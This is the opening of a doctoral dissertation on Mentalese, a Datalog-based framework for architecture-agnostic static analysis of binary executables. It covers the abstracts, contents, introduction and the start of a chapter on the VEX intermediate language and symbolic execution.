MENTALESE - An Architecture-Agnostic Analysis Framework for Binary Executables

Dissertation zur Erlangung des Grades eines Doktor-Ingenieurs der Fakultät für Elektrotechnik und Informationstechnik an der Ruhr-Universität Bochum

vorgelegt von

Behrad Garmany geboren in Maschhad

Bochum, November 2020 ii

Gutachter: Prof. Dr. Thorsten Holz, Ruhr-Universität Bochum

Zweitgutachter: Prof. Dr. Konrad Rieck, Technische Universität Braunschweig

Tag der mündlichen Prüfung: 11. Februar 2021 Acknowledgements

I am deeply grateful to my advisor Prof. Dr. Thorsten Holz for his support, guidance, and patience. He has given me the chance to pursue my interests in binary analysis and reverse engineering, which have been the focus of my studies for the past years. I would also like to thank Prof. Dr. Konrad Rieck for spending his valuable time for the review of this work. During my time at the chair of systems security, I had the chance and the pleasure to work with inspiring, collaborating, and hard working people to achieve common research goals. In particular, I would like to mention Martin Stoffel, Robert Gawlik, Jannik Pewny, Moritz Contag, Philipp Koppe, Benjamin Kollenda, Andre Pawlowski, Tim Blazytko, and Sebastian Vogl. Special thanks goes to Jannik Pewny who was spending his precious time to present our paper at the 34th Annual Computer Security Applications Conference whilst I was unable to travel, even though he was not part of the group of authors. Additionally, I would like to thank Cornelius Aschermann for inspiring talks and brainstorming discussions as well as a continuous reminder to keep going. I would also like to thank all other students who I had a great time with during my years at the chair. I want to express my gratitude to my friends Carsten Willems, Johannes Dahse, and Felix Schuster for their continuous support and encouragement to not lose track. My deepest gratitude goes to my parents and my sister for their unconditional love and support over all the years, encouraging me to pursue my passion. In the past three years I had the greatest luck to spend my life with my fiancé Verena who stood by my side and supported me with all my decisions.

Abstract

Static program analysis enables to reason about program behavior and its semantic properties without actually running the program. It enjoys a wealth of achievements based on decades of research. Unfortunately, it comes with some unpleasant computational drawbacks that stem from the problem that almost any interesting property to reason about is undecidable. Our field of research presented in this thesis, tackles a niche in the sector of program analysis which comes with the aspect of binary programs. At the end of each translation pipeline, it is the binary that is executed. Apparently, binary program analysis is the only choice when source code is not available. While it poses additional challenges that increase the complexity giving rise to more undecidable problems to deal with, it also has some pleasant properties which aid in the process of the analysis. Syntactic edge cases and language features, for instance are in a sense canonicalized, and many modules of a program are compiled into a single binary. The Internet of Things era has given rise to a high competition among companies that induced the use of commercial third party software that are usually shipped as binaries. A popular trend in third party code reuse incorporates more and more open source software which comes at risk. This era poses an additional interest in architecture agnostic tools that aid in the process of cross architecture binary analysis. Similarly to the interest for source code analyzers that concentrate on covering many languages, our interest concentrates on covering many architectures. This brings us to the first problem to be tackled—aside from the disassembly and control flow recovery— which comes with the choice of a proper intermediate language (IL). Ideally, the IL covers many architectures, has a small semantic footprint (small instruction set), and allows developing generic analyses that can be applied to all architectures. This thesis introduces Mentalese (language of thought), a framework for architecture agnostic analysis. The name is inspired by the philosophical hypothesis that assumes a language in which processes of thought take place. The way we approached binary analysis resembles in many ways this process. We discuss in this work our early steps to find a suitable IL and specify the design and the choices we made to build a framework that adds value to our field of binary analysis. The design of Mentalese, is concentrated to be scalable, flexible, accessible, and extensible. Based on our prototype we have developed tools that aided in the process of exploitation, cross architecture bug search, and bug detection.

Zusammenfassung

Die statische Code-Analyse ermöglicht das Ableiten von Aussagen über das Program- mverhalten und seine semantischen Eigenschaften ohne die tatsächliche Ausführung des Programms. Das Feld genießt einen Reichtum von Errungenschaften, die auf jahrzehntelanger Forschung beruhen. Leider ist mit der statischen Analyse das klassische Problem der Unentscheidbarkeit verknüpft, da fast jede interessante Eigenschaft nach der wir fragen eine nicht triviale und semantische Eigenschaft ist. Die Gesetzte der Berechenbarkeit erlauben kein Programm das für alle Programme eine solche Eigenschaft nachweisen kann. Die in dieser Dissertation vorgestellte Forschung nimmt eine Nische im Bereich der statischen Programmanalyse ein, dessen Anwendung sich auf binäre (aus- führbare) Programme fokussiert. Am Ende der Übersetzungspipeline des Quellcodes, ist es die Binärdatei, die auf der jeweiligen Maschine zu Ausführung kommt. Ist der Quellcode nicht verfügbar, so bleibt die binäre Analyse die einzige Wahl. Hierdurch wird die Analyse vor zusätzliche Herausforderungen gestellt, die wir in dieser Arbeit diskutieren. Allerdings hat die Analyse auf binärer Ebene auch Vorteile vorzuweisen. So werden syntaktische Strukturen und Sprachfeatures auf Maschinenebene kanonisiert. Auch werden viele Quellcode Module in eine einzige ausführbare Datei übersetzt, so dass das Programm im Gesamtkontext analysiert werden kann. Die Ära des Internets der Dinge (IOT) hat zu einer erhöhten Konkurrenz zwischen Unternehmen geführt, die vermehrt den Einsatz von kommerzieller Software von Drittanbietern induziert. Diese werden üblicherweise als ausführbare Binärdateien ausgeliefert. Ein beliebter Trend bei der Wiederverwendung von Drittanbietercode umfasst immer mehr die Einbindung von Open-Source-Software, die nicht ohne Risiko ist. Die Konsequenz ist ein Bedarf an architekturunabhängigen Tools, die den Prozess der architekturübergreifenden Binäranalyse ermöglicht. Dabei verfolgen wir, analog zum Trend kommerzieller Quellcodeanalysen, die ein möglichst breites Spektrum an Programmiersprachen abdecken, das Interesse möglichst viele Architeckturen abzudecken. Dies führt uns zu unserem ersten Problem, das neben dem Prozess des Disassemblierens und der Wiederherstellung des Kontrollflusses, die Wahl einer geeigneten Zwischensprache (intermediate language oder IL) in den Vordergrund stellt. Idealerweise deckt die IL viele Architekturen ab, hat einen kleinen Befehlssatz und ermöglicht die Entwicklung generischer Analysen, die auf alle Architekturen angewendet werden können. Bisherige Ansätze in der Forschung zur binären Analyse scheitern an der Skalierbarkeit und Stabilität. Diese Dissertation befasst sich mit unserer protoptypischen Implementierung von Mentalese (Sprache des Geistes), ein Framework für architekturunabhängige Analysen ausführbarer Programme. Der Name stammt von der philosophischen Hypothese ab, die von einer Sprache ausgeht, in der Denkprozesse stattfinden. Die Art und Weise, an der wir uns den Problemen der Binäranalyse nähern, entspricht in vielerlei Hinsicht diesem Prozess. Diese deklarative Art der Problemlösung ist eines der Konzepte von Mentalese. Das Design von Mentalese ist so konzipiert, dass es skalierbar, flexibel und leicht erweiterbar ist. Auf der Grundlage dieses Frameworks haben wir Tools entwickelt, die den Exploitation-Prozess unterstützen, eine architekturübergreifende Bug-Suche ermöglichen, sowie auch Bugs erkennen. Contents

List of Figures xiii

List of Tables xv

List of Abbreviations xvii

1 Introduction 1 1.1 Binary Landscape ...... 3 1.2 Challenges ...... 4 1.3 Contributions ...... 5

2 Foundations 9 2.1 The VEX Intermediate Language ...... 11 2.2 Symbolic Execution: Steps with VEX ...... 14 2.2.1 Cross-Architecture Basic Block Semantics ...... 17 2.2.2 Path Extraction for Dynamic Hooks ...... 21 2.3 A suitable IL ...... 22 2.3.1 Dataflow Essentials ...... 26 2.3.2 Static Single Assignment ...... 28

3 Mentalese - A Binary Analysis Framework 37 3.1 From Datalog to Binary Analysis ...... 38 3.1.1 Datalog ...... 39 3.1.2 Knowledgebase: A Mental-IR ...... 41 3.2 Overview ...... 44 3.3 Frontend ...... 47 3.3.1 Stack Normalization ...... 48 3.3.2 SymIL Extensions ...... 50 3.3.3 Scopes ...... 51 3.4 Backend ...... 54 3.4.1 Transition Descriptors ...... 54 3.4.2 Pointer Analysis ...... 57 3.4.3 Flow-Sensitivity ...... 64

ix x Contents

3.4.4 Context-Sensitivity ...... 65 3.5 Analysis Derivatives ...... 69 3.5.1 Taint-Analysis ...... 69 3.5.2 Value Propagation ...... 74 3.5.3 Slicing ...... 75 3.6 Experimental Study: Pointer Analysis ...... 77

4 Towards Automated Generation of Exploitation Primitives for Web Browsers 87 4.1 Model and Assumptions ...... 89 4.2 Design ...... 93 4.2.1 Finding Sinks ...... 95 4.2.2 Program Paths ...... 96 4.2.3 Triggering Input ...... 102 4.2.4 Implementation Details ...... 103 4.3 Evaluation ...... 103 4.3.1 Exploitation Primitive Trigger (EPT) ...... 103 4.3.2 Fine Tuning ...... 106 4.4 Discussion and Limitations ...... 106 4.5 Related Work ...... 107 4.6 Conclusion ...... 108

5 Static Detection of Uninitialized Stack Variables in Binary Code 109 5.1 Uninitialized Stack Variables ...... 111 5.2 Design and Approach ...... 113 5.2.1 Safe Zones ...... 114 5.2.2 Interprocedural Flow Analysis ...... 116 5.2.3 Symbolic Execution ...... 118 5.2.4 Implementation ...... 119 5.3 Evaluation ...... 119 5.3.1 CGC Test Corpus ...... 119 5.3.2 Real-World Binaries ...... 120 5.4 Discussion ...... 121 5.5 Related Work ...... 124 5.6 Conclusion ...... 126

6 Conclusion 127

Appendices Contents xi

A JavaScript Code Corresponding to CVE-2016-9079 133

Publications 137

References 139 xii List of Figures

2.1 Excerpt of the VEX grammar taken from [147]...... 13 2.2 IRSB for mov eax, [esp+18h]...... 14 2.3 Overview of our architecture for symbolic execution and evaluation. 15 2.4 Execution using abstract environments...... 16 2.5 x86 vs Armv7: Basic blocks representing the same lines of code and their corresponding summaries in S-Expression form...... 20 2.6 Slice/Path extraction and output of Symbolic Execution...... 23 2.7 SymIL Grammar...... 25 2.8 ARM Code to SymIL...... 26 2.9 Simple Worklist Algorithm...... 27 2.10 Placement of φ-functions [63]...... 31 2.11 Renaming IL-Expressions...... 35

3.1 Syntax tree of zf_4 ← rax_2 + 2 == 0 and facts that represent it. 46 3.2 Highlevel Architecture of Mentalese...... 47 3.3 x86-64 lifting...... 48 3.4 Normalized stack for x86 architecture: a) The stack arrangement for a normalized stack. The initial stack pointer (sp) is not touched by the function’s prologue. b) The rebased arrangement for a normalized stack...... 50 3.5 Scopes: a) live definitions at the callsites to libssh2_list_add. b) Entry node of libssh2_list_add...... 52 3.6 ARMv7 Thumbv2 and x86-64 assembly on the left side; corresponding SymIL on the right side...... 53 3.7 Transition Descriptors...... 56 3.8 Points-To Graph and its corresponding C program. Black edges are address taken edges, blue edges are inclusion edges, red edges are propagation edges...... 59 3.9 PtsTo specification: PtsTo(reg,disp,access,type,id,bb,order,ctx). 60 3.10 Assembly code to the C code of Figure 3.8: left code shows x86-64 assembly, right code its Armv7 counterpart in Thumbv2...... 61 3.11 Pointer Analysis...... 63

xiii xiv List of Figures

3.12 Extensions for Context-sensitivity...... 68 3.13 Taint specification: Taint(reg, disp, color, taint_descr, bb, order, ctx)...... 70 3.14 Rule Set: Extensions for Taint Analysis...... 72 3.15 PtsTo and Taint output of the program presented in Figure 3.16 . . 73 3.16 C routine and its x86-64 assembly code (O0)...... 76 3.17 Number of Points-To facts for Binutils and nginx in relation to k-sensitivity and flow sensitivity. With fs we denote the partial flow- sensitivity + reaching definition. With nfs we refer to its counterpart without reaching definition...... 82 3.18 All matches of top-10 ranks. The upper matrix shows the results for x86-64, the lower matrix shows the results for Armv7. A score that does not make it into the top-10 is given a score of 0. O0 vs O0 and O2 vs O2 binaries are not matched for x86. Similarly, for ARMv7 the versions old vs old and new vs new are not matched...... 85

4.1 Architecture implemented by PrimGen...... 91 4.2 Rule Set: Tainted Sinks...... 95 4.3 Taint Propagation Graph (TPG) of our running example: leaf nodes are attacker sinks...... 97 4.4 Running example (CVE-2016-9079 ): Path generated from a control point at 0x107a00d4 into an indirect call sink. On the left side, the assembly code is shown which is executed along the path into the sink at 0x101c0cb8. The arrows indicate the mapping to a controlled memory region. Each generated path is associated with a memory map. All offsets are relative to the base address. Each memory map is transformed into a tree structure...... 98 4.5 JS EPT excerpt...... 102 4.6 Y-Axis:Number of satifiable paths which lead to an attacker sink; X-Axis: Path length (number of basic blocks)...... 104

5.1 Uninitialized use of a stack variable: On the left side the intraproce- dural case, on the right side the interprocedural...... 112 5.2 Architecture implemented by our prototype...... 114 5.3 Sketch: Computation of Safe Zones ...... 116 5.4 Graphical representation of labeling safe edges...... 117 List of Tables

3.1 EDB-Facts that get extracted from a binary...... 45 3.2 Transition-events...... 54 3.3 GNU Coreutils v8.32 (O0 compilation): Number of facts. . . . . 78 3.4 Number of facts for Binutils v2.35 and nginx v1.17.9...... 78 3.5 Pointer Analysis performance: O0/O2 seconds in relation to k- sensitivity and flow-sensitivity. FS-RD denotes partial flow sensitivity (FS) without a reaching definition analysis (RD) for stack variables. For missing values, the analysis ran out of RAM...... 79 3.6 Reduction in the number of Memory-facts from O0 to O2 for x86-64. 79 3.7 Ranks 1 and 2 of matches compiled for x86-64: Binutils are in v2.35, Coreutils in v8.32, and nginx in v1.17.9. Binaries denoted with distro are taken from Ubuntu 18.04.4 LTS. Binutils-distro are in v2.30, and nginx-distro in v1.14.0 ...... 84 3.8 Ranks 1 and 2 of matches for ARMv7 (EABI LE): Binutils v2.25 vs v2.34 and Coreutils v8.23 vs 8.32. If matching score between two versions of the same program is not in the top-2, its rank is given explicitly...... 86

4.1 Overview of the affected CVEs and our analysis results: The fourth column shows the number of alternative exploit primitives (sinks) denoted as EIP/WWW/WrW. The fifth column shows the number of satisfiable paths which lead to the attacker sinks. Among these paths, PrimGen generated EPTs, listed in the sixth column. The seventh column lists the number of attacker sinks we cover through EPTs, denoted in the same fashion as in the fourth column. The eight column depicts if the original PoC sink is triggered by any of our inputs. The last column shows the verification time in minutes for satisfiable paths...... 105 4.2 Taint analysis results for case studies. The third column lists the number of reachable functions from the control point. The fourth column shows the number of functions which operate on controlled data. The last column lists the timings (in seconds) for the taint analysis...... 105

xv xvi List of Tables

5.1 Analysis results for the relevant CGC binaries that contain an uninitialized memory vulnerability...... 122 5.2 Analysis results for binutils-2.30, ImageMagick-6.0.8, gnuplot 5.2 patchlevel 4. Number in parentheses denotes the number of verified bugs...... 122 List of Abbreviations

AST ...... Abstract Syntax Tree CBD ...... Component-based Development CDG ...... Control Dependence Graph CFG ...... Control Flow Graph CGC ...... Cyber Grand Challenge CPG ...... Code Property Graph DDG ...... Data Dependency Graph DU ...... Definition Use or Def-Use EDB ...... Extensional Database (Datalog) EIP ...... Extended Instruction Pointer EPT ...... Exploitation Primitive Trigger ICFG ..... Interprocedural Control Flow Graph IDB ...... Intensional Database (Datalog) IL ...... Intermediate Language IR ...... Intermediate Representation IoT ...... Internet of Things PDG ...... Program Dependence Graph PoC ...... Proof of Concept RE ...... Reverse Engineering SDG ...... System Dependence Graph SMT ...... Satisfiability Modulo Theories SSA ...... Static Single Assignment SPD ...... Stack Pointer Delta TCG ...... Tiny Code Generator TPG ...... Taint Propagation Graph

xvii xviii List of Abbreviations

UD ...... Use Definition or Use-Def VUT ...... Vulnerability Test Case WrW ..... Write-Where WWW .... Write-What-Where 1 Introduction

Contents

1.1 Binary Landscape ...... 3 1.2 Challenges ...... 4 1.3 Contributions ...... 5

Software drives and dominates almost every aspect of our global and personal life. With the Internet of Things revolution almost any electronic device gets its intelligent trademark being driven by more and more complex software. The problem gets more traction as these devices communicate with each other, opening gates to interact with a huge input space. How can we be sure that the software does what it was intended to do? Moreover, how can we reason about its behavior and make assumptions about bad states that it might reach? This is a classic problem of program analysis that enjoys achievements based on decades of research. A cornerstone among these achievements is known under the term of static analysis. Static program analysis aims to enable the instruments to reason about program behavior and its semantic properties without actually running the program on specific inputs. This stands in contrast to dynamic approaches which actually run the program and, by the time of this writing, are experiencing a blossom period, mainly driven by the trends that are pushed by the fuzzing research. It almost seems that the classic roles of the last decade have switched in a sense that static analysis used to be slow and dynamic analysis was fast and rather simple. But right now we are witnessing a trend that goes in the opposite direction where dynamic analyzers are slow and are driven by information of static analyzers

1 2 1. Introduction that are fast. These observations among others that we discuss in this chapter are the driving force of this work. One of the advantages of static analyzers that are postulated by traditional literature is its coverage, i.e., reasoning about all program executions. In this sense, static analysis is a more comprehensive approach as opposed to dynamic analysis. However, the capability in static analysis to start from any program point and drive the analysis from that point is what we value most. This concept is used in Chapter 4, where we approach a static taint analysis starting from arbitrary locations. Unfortunately, static analysis comes with some unpleasant computational draw- backs as we need to arrange ourselves with the fact that almost all problems are undecidable stemming from the property that the halting problem can be reduced on them. In fact, by Rice’s theorem, we know that we cannot build an algorithm that can give us a desired answer about any non-trivial semantic property for all programs. Although the landscape looks demotivating, it does not mean that we are running against a wall. The traditional approach here is to arrange ourselves with some imprecision and forget about the all aspect of the theorem. To defy the halting problem and sidestep the undecidable nature of static analysis [120], static analysis techniques use approximations. The core concepts is driven by abstraction. In terms of a more general foundation given by the perspective of abstract interpretation [55], this means that we look at specific properties in each statement, and put a filter on these statements which eliminate certain details, yet retain enough key information about properties of interest, such as the sign or the integer range. These abstractions are also referred to as abstract elements. The program is basically dismantled with respect to these abstractions, transformed into a simpler abstract domain where the program is executed by abstract transformers of the domain. These transformers describe the operational semantics of the domain, i.e, how the program is executed mimicking the concrete execution with respect to the abstract properties. This execution has to be a sound over-approximation of the concrete semantics. In particular, this means, that if we start at an abstract # state s0 , execute the program in the abstract domain, concretize its output, we get a set of states that is a superset of all concrete executions that start at the concrete 1 state s0 . Usually the abstract states represent a superset of concrete states and we are executing a collection of these states. In other words, the concrete set of states is a subset of the concretized abstract states. Intuitively, it also means loss of precision, and loss of precision is the main reason for false positives.

1 # The concrete counterpart of s0 1. Introduction 3

1.1 Binary Landscape

Binary code analysis is highly related to the process of Reverse Engineering (RE). Originally introduced with respect to hardware devices, it is nowadays often related to software. With RE comes the capability to reconstruct, identify, and map details about the software into a higher level of abstraction which are lost or obscured during the translation process into machine code. This makes RE an invaluable application in the process of binary analysis. Another term that is often related to binary analysis is the disassembly. A so-called disassembler takes the binary and translates the machine code into assembly code. This is often the first step in the process of the analysis. One of the driving forces behind binary analysis is malware coming with great versatility shaping different forms, such as classical viruses, worms, Trojan horses, spyware, browser and database extensions or even games. Some of these try to resist reverse engineering processes by utilizing obfuscation techniques [149, 128, 53]. Here, binary analysis aids in both ways, on either helping in the process of reverse engineering (deobfuscation) or in the process of obfuscation itself. The latter case, aside from malware, is interesting for intellectual property protection. The analysis of binary code is critical when source code is not available. In some cases the source code might even be lost, leaving binary analysis to be the only option to deal with the code. But even in the presence of source code, binary code analysis is essential, because at the end of the translation pipe line of any source code, it is the binary code that is run on the bare metal. Does this code have the same semantics as the higher level code? This question arises from the “what you see is not what you execute” aspect in the translation process. Source code might not be reflected semantically equivalent to what is executed on the machine code level. Aggressive optimization procedures can change the semantics or even produce incorrect code. Coming with a huge and complex code base, compilers can become a cumbersome companion of trust in the process of software development. Yang et al., for instance, found over 300 bugs in compilers discovered by synthesized C programs, some of which have the nature of incorrect code [214]. We know that compilers can also optimize checks away. Many of these problems arise by undefined behavior where the compiler has the freedom to do what it wants for the sake of producing efficient code. These optimizations have sparked debates in the recent past between practitioners and compiler writers. With the Cloud as a platform for software development, it might not be uncertain to have malicious compilers installed on the system. A malicious 4 1.2. Challenges compiler pass might emit backdoors or vulnerabilities that are triggered when a certain CPU or memory state is reached. The Internet of Things (IoT) era has given rise to a high competition among companies. This pressure enforces the use of commercial third party software which is usually shipped as binaries. According to a study of VDC Research [83], around 40 percent of developers in the embedded field report delays in the shipment. To overcome the delay, more and more third party software is incorporated. Component- based development (CBD) is a common strategy in software engineering to boost productivity and control. It is not uncommon and has become a common practice in modern software development to incorporate multiple modules from different vendors to compose a software system. The trend also goes into utilizing open source software which can be seen as an external supplier and comes with risk. Most vendors of commercial software follow a closed source policy, which leaves the consumer to either trust the shipped binaries or perform audits on the machine code level.

1.2 Challenges

Performing static program analysis on the binary level poses additional challenges and increases the complexity of the analysis techniques which we briefly described previously. Typical difficulties are for example the lack of symbol names and the loss of information about data structures. As the processor operates on integers and float values, all complex data structures are mapped on these atomic datatypes. Additionally, knowledge about the hardware (e.g., the underlying instruction set architecture) is necessary to understand both the code and data. Furthermore, the disassembly problem—as a non trivial and semantic property—is known to be undecidable in the general case [38, 100]. These are problems that make it challenging to achieve soundness, as we cannot reason about all possible executions. Making safe/conservative assumptions can become a burden for 1) scalability and 2) precision. For this reason, many bug hunting tools and commercial analyzers are neither sound nor complete. But besides the challenges, the analysis on binary level also comes with benefits. Large code bases with billions of lines of code are certainly not the landscape of static analyzer to perform. In such code bases it is unclear which modules interact and are destined to be compiled into the binary. At the end of the pipeline, all modules are linked into a single binary which let’s us analyze the program in the purposed context. The binary level is the lingua franca between program and CPU. As such, it can also be seen as a communication layer that canonicalizes 1. Introduction 5

syntactic constructs. For instance, a field access in a struct can be realized as p->fld or (*p+fld). Such equivalent constructs are abstracted away on the binary level and an analyzer does not need to cope with it. Analysis of binary code is typically done by lifting the disassembly to an intermediate language (IL). This approach simplifies the process of the analysis task since we work with a small number of expressions compared to the tremendous amount of instructions that are, for instance, present in the x86-64 architecture of Intel. For example, many instructions implicitly change the state of registers: an x86 add instruction performs an addition and changes the state of the flags register; a push instruction pushes data to the stack and changes the stack pointer. IL frameworks have to account for these implicit state changes, which are often stated explicitly in their specific language. Lifting binaries to an IL is not a trivial task, especially for complex instruction set architectures. Recent research has favored the VEX intermediate representation of the framework [158, 191, 181]. VEX is a popular choice in the binary analysis community for many analysis frameworks, either by using it as their main IL or as a base to lift it to another, more high-level IL [30, 188].

1.3 Contributions

Our field of research presented in this work, tackles a niche in the sector of program analysis which comes with the aspect of binary programs. When we started, the landscape did not consist of any frameworks/tools—beside some commercial golden standards—that give us a stable ground to build and prototype ideas at scale. By now, things look better, with tools, besides IDA Pro, such as Ghidra, Binary Ninja, and Angr which expose a rich API and bring a fresh breeze into the field. However, when building program analysis tools, we need to start with the basics in a bottom-up manner, that is, developing the building blocks. Although many modern disassemblers and CFG reconstruction tools use sophisticated analysis algorithms techniques to give us the ground to work on, they do not allow us to tap into the algorithms or use them for our own needs. Basics like reaching definition analysis, dominator relations, dominance frontiers are important building blocks. Another important technique is the conversion to static single assignment form (SSA), whose steps in the different stages of its algorithm [63] can—as we see in the next chapter—give us valuable information to build analysis algorithms. When we started to work on simple dataflow problems, we realized that we are concentrating more on the design of the algorithm, its arrangements and the 6 1.3. Contributions properties that need to be fulfilled to reach a fixpoint, rather than the problem itself. Each building block needed some mechanism of communication to make its information accessible for other building block techniques. The process became an error prone and annoying task that we strived to avoid. In this work our aim is to achieve a generic, architecture agnostic and most importantly, a scalable, accessible framework to give a common ground of building analysis algorithms. One of our goals is to achieve flexibility giving us a powerful instrument to build analysis tools that target binary executables.

The framework we present in this work is called Mentalese (language of thought). The name is inspired by the philosophical hypothesis that assumes a language in which processes of thought take place [78]. This language is called mentalese and is described as a language which has a compositional structure; the meaning of complex representations results from the sum of all the parts that contribute to the meaning. The way we approached the binary analysis resembles in many ways this process. In fact the declarative, Datalog based approach of our framework mimics this nature, where certain facts that represent a property are combined with other facts to derive a new fact. These facts basically sum up to build a new meaning in form of the derived facts extending the mental image of the program under analysis. As we see in Chapter 3, a declarative, compositional structured arrangement gives us a flexible instrument, and more importantly allows us to focus on the problem.

In summary, we make the following contributions.

Chapter 2: Foundations

In this Chapter we describe the foundation of our framework: The IL it builds on and how we adapt and use standard techniques for our purpose. The chapter describes the problems we faced in the early stages with VEX-IR and how these problems motivated us to follow a road that turned into the development of Mentalese. Published papers that are based on this work are:

1. Dynamic Hooks: Hiding Control Flow Changes within Non-Control Data [207]

2. Cross-Architecture Bug Search in Binary Executables [158] 1. Introduction 7

The first work uses our early achievements to extract and derive program paths that trigger a dynamic hook. The paper was published at the Usenix Security Symposium 2014 in a joint work with Vogl, Gawlik, Kittel, Pfoh, Eckert, and Holz.

The second publication uses extensions of our framework to build semantic basic block summaries. The core idea is to find buggy signatures across different binaries for different architectures. Given the control flow graph (CFG) of each function of the program, we lift each basic block to an IR, and transform each instruction of the block into a formula. Based on these formulas sampling is performed and locally sensitive hashing upon the sampled I/O pairs. These pairs are used to give us a similarity metric. Our approach and the corresponding experiments were published at the IEEE Symposium on Security and Privacy 2015 in a joint work with Pewny, Rossow, Gawlik, and Holz.

Chapter 3: Mentalese - A Binary Analysis Framework

This chapter describes the motivation, concepts and design of Mentalese. It addresses details about our design choices that were incorporated into our IR, as well as details about the pipeline on how the binary is processed. This chapter builds the foundation for the rest of the chapters.

Chapter 4: Towards Automated Generation of Exploitation Primitives for Web Browsers

This chapter evaluates a technique to automatically derive exploitation primitives. The targets we choose were web browsers as we found the problem in these scenarios particularly interesting. Furthermore, we wanted to take the challenge and try our tools on browsers as these are not usual targets. The motivation here is that a crash does not put us in an exploitable state. Given a vulnerability trigger, and a control point, the goal is to drive the execution into exploitation primitives and determine suitable values for JavaScript field objects that satisfy the paths that lead to the primitive. The chapter describes the design of a tool that builds on Mentalese. This work was published at the 34th Annual Computer Security Applications Conference (ACSAC 2018) [79], and was achieved in collaboration with my co-authors Stoffel, Gawlik, Koppe, Blazytko, and Holz. 8 1.3. Contributions

Chapter 5: Static Detection of Uninitialized Stack Variables in Binary Code

One of the classics on undecidable static analysis problems comes with the use of uninitialized variables. In this chapter we describe the design of a framework that builds on Mentalese to tackle the problem for binary executables. We published this work at the 24th European Symposium on Research in Computer Security (ESORICS 2019) [80] together with my co-authors Stoffel, Gawlik, and Holz. 2 Foundations

Contents

2.1 The VEX Intermediate Language ...... 11 2.2 Symbolic Execution: Steps with VEX ...... 14 2.2.1 Cross-Architecture Basic Block Semantics ...... 17 2.2.2 Path Extraction for Dynamic Hooks ...... 21 2.3 A suitable IL ...... 22 2.3.1 Dataflow Essentials ...... 26 2.3.2 Static Single Assignment ...... 28

In this chapter, we lay the foundation for our analysis framework. We start with a journey and our first steps with symbolic execution of binary executables at a time where no frameworks were present to face the problems we wanted to address. We describe how our implementation evolved to create a valuable building stone for several publications. At the end of this chapter we describe the motivation and processes of our lessons and why we went to develop Mentalese.

The previous chapter gave us an overview on the problem of static analyses, in particular concerning binary code. Modern architectures offer a rich and complex set of instructions. On x86, for instance, the set of instructions is in the magnitude of thousands. A static analysis that needs to reason about the execution of a program faces the problem of modeling its operational semantics in accordance to these instructions. However, such a task to build a static analysis on top of it is cumbersome, especially in the presence of multiple architectures. This complexity has given rise to a typical approach which includes the lifting of binary code to

9 10 2. Foundations an IL. Ideally, this language has a few instructions. The number of instructions is crucial because it can blow up the lifted code, as for a single CPU instruction we might need several IL instructions for a semantically equivalent lifting. Once the binary is lifted, the analysis proceeds on the IL rather than the binary. This comes with several advantages:

• Analyzers deal with less instructions.

• By design, it eases the appliance of program analysis techniques. Modern compilers transform the source code to an intermediate representation IR to perform optimization before the code is emitted to machine code.

• Analyzers can be applied to binary code in an architecture-agnostic fashion.

However, a shortcoming, though only done once, is the mapping and semantically equivalent modeling of native instructions to the IL. Considering the side effects of some instructions and the fact that the IL needs to semantically reflect the native instructions, we again run into a non trivial and cumbersome task. Assuming that the purpose of the IL is not for execution, e.g., being jitted or interpreted, an approach to tackle this problem is to incrementally add semantics to the IL when needed. For instance, we might skip the effects the instructions have on flags and add them when the necessity arises for the analysis. This approach requires a flexible framework that can handle incremental improvements of its IL without breaking prior analysis. Furthermore, the framework should allow a transparent integration of new language expressions which interact with the present set of expressions. The search for a proper IL blossomed with the revival of symbolic execution. Proposed in the 70s [25, 116] it gained interest with faster, more powerful hardware resources and advancements on the field of SMT solvers. Systems like CUTE, DART, and SAGE [179, 85, 86] build up the foundation for future research. In 2006 KLEE was introduced, a LLVM based symbolic execution engine, that evolved to the state-of-the-art engine for source code level execution. In order to use KLEE for binary purposes, a system called S2E was introduced in 2012. S2E is the first and only system available that allows symbolically execute a whole operating system. Strategies like selective symbolic execution are introduced, which allow to basically “select” areas of code that undergo symbolic execution. S2E is based on QEMU [18], a state of the art emulator. The core of the emulation process is TCG (Tiny Code Generator) which translates the guest instructions to the host instructions. By doing so, the TCG receives its own IL instructions, performs optimization on them, and translated them into the host machine code. S2E intercepts this process by 2. Foundations 11

lifting the TCG-IL into LLVM and passing the resulting LLVM bitcode to KLEE. The heavyweight strength of S2E also comes with a a lot of complexity, making the system not easy to handle and adapt to changes. In fact it relies on old versions of QEMU and LLVM. Prior to S2E, the first systems on the binary level made their debut with BitBlaze, BAP [30, 188]. The former is build on top of the VEX IR. VEX is a RISC-like load-and-store language designed for dynamic binary instrumentation. It is part of the renowned Valgrind framework [152, 151]. The design is focused on dynamic analysis. However, due to the cumbersome task of designing, implementing, and lifting binary code to an IR, VEX is chosen by many systems. It’s support for multiple architectures makes it particularly attractive. Lifters are available for MIPS, ARM, PPC, and x86 in both 32 and 64-bit. Valgrind itself does not return the IR it generates, as it is set up to translate from machine code back to machine code using the IR as a layer to perform instrumentation and analysis. Furthermore, information about side effects of instructions that affect the processor flags are handled internally by helper functions and are not expressed explicitly through the IL. BitBlaze further lifts the VEX-IR to Vine-IL expressing the flags explicitly. Inspired by Vine-IL, BAP (Binary Analysis Platform) introduces BIL but avoids the VEX pipeline. Mayhem [39], the winner of the DARPA Grand Challenge is based on BIL. With pyvex [181], Python bindings to LibVEX 1 were first introduced enabling fast prototyping, making VEX accessible for static analysis. Based on pyvex, the creators later introduced a binary analysis framework called Angr [182]. Angr’s strength comes with its flexible and interactive nature making it accessible and easy entrance into the field of symbolic execution. Its engine has a rich API and is scripted through Python. Any interaction with the IL is abstracted away. However, Angr’s debut came after we made our first moves with pyvex. Rather than reinventing the wheel, we decided to use VEX. It was our first choice to build a binary framework to apply our ideas. However, we also learned over time that it is not an optimal choice for our use cases.

2.1 The VEX Intermediate Language

So far we treated the notion of an IL and IR interchangeably. In general an IR is a data structure that represents the program. The CFG, for instance, can be seen as such an IR. An IL—as the name suggests—is a language in which the original program is translated to. This definition allows an IR to be an IL but not vice versa.

1Library that implements the IR 12 2.1. The VEX Intermediate Language

VEX translates each machine instruction into a bunch of IR instructions, so called statements (IRStmt). To easily grasp the idea, a visualization of these instructions is given in Figure 2.2 which has the form:

IRStmt = IRExpr

